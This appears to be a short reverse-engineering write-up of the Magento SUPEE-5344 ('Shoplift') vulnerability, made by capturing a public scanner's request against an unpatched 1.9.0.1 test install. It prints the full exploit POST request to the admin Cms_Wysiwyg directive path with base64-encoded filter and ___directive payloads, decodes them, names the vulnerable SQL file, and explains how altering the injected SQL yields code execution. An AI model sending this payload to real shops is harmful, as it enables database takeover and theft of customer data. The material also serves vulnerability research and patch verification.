**Reverse Engineering writeup for Magento Patch SUPEE-5344**

All credit to https://shoplift.byte.nl for their vunlerability scanner.

No responsibility is accepted by the author for the actions carried out by utilisation of the following information, by any party.

****

A few days ago, byte.nl released a tool for checking vulnerability of online sites for a bug in the e-commerce platform Magento, v1.9.0.1, which presented an SQL injection opportunity through the 'forwarded' parameter on certain /admin paths. Apparently a technical writeup is to follow shortly.

The method to find the exploit was to set up a clean instance of Magento 1.9.01 (unpatched), and submit a vulnerability check on the server, tracking the request and response from Apache.

This process can be emulated using the following steps:

* Get a clean version of the 1.9.0.1 install from https://www.magentocommerce.com/products/downloads/magento/

* Install on a clean server, enabling mod_rewrite, and mod_dumpio in Apache

* Check installation is working (database is writeable) and mod_dumpio is writing to /var/log/error.log

* Disable mod_deflate and gzip compression in PHP / Apache

* Submit a request on byte.nl's tool to the site.

* Halt mod_dumpio logging and analyse the HTTP POST traffic / response.

****

Using the above method, byte.nl's tool appears to submit the following HTTP request.

POST {{SITE_URL}}/index.php/admin/Cms_Wysiwyg/directive/index/

filter=cG9wdWxhcml0eVtmcm9tXT0wJnBvcHVsYXJpdHlbdG9dPTMmcG9wdWxhcml0eVtmaWVsZF9leHByXT0wKTs=&___directive=e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ&forwarded=1

The filter and ___directive k/v's are base64 encoded. Decoding the above values:

filter = popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);

___directive = {{block type=Adminhtml/report_search_grid output=getCsvFile}}

Following the patch (https://tools.byte.nl/magpatch/v1.8.0/patch-shoplift.sh), the 'filter' k/v is appended to the SQL statement in __/lib/Varien/Db/Adapter/Pdo/Mysql.php lib/Varien/Db/Adapter/Pdo/Mysql.php__

Editing this SQL, re-encoding to base64, and submitting the POST request with the altered value allows for arbitrary code execution and remote file execution (according to SQL permissions).

Use responsibly,